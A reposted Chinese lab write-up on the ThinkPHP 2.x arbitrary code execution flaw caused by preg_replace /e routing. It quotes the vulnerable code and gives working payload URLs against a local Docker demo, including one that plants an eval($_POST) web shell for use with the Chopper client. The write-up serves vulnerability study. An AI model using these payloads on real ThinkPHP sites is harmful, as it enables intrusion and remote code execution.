ICode9

精准搜索请尝试: 精确搜索
首页 > 编程语言> 文章详细

ThinkPHP 2.x 任意代码执行漏洞

2021-12-31 20:04:34  阅读:228  来源: 互联网

标签:index 8080 0.1 漏洞 代码执行 ThinkPHP http


漏洞简介

ThinkPHP 2.x版本中,使用preg_replace/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

漏洞复现

执行如下命令启动ThinkPHP 2.1的Demo应用:

docker-compose up -d

环境启动后,访问http://your-ip:8080/Index/Index即可查看到默认页面。

在这里插入图片描述

http://127.0.0.1:8080/

在这里插入图片描述

http://127.0.0.1:8080/index.php?s=/index/index/xxx/${@phpinfo()}

在这里插入图片描述

http://127.0.0.1:8080/index.php?s=a/b/c/${@print(eval($_POST[1]))}

在这里插入图片描述

利用菜刀进行连接

在这里插入图片描述
在这里插入图片描述
参考链接

标签:index,8080,0.1,漏洞,代码执行,ThinkPHP,http
来源: https://blog.csdn.net/weixin_51387754/article/details/122230764

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有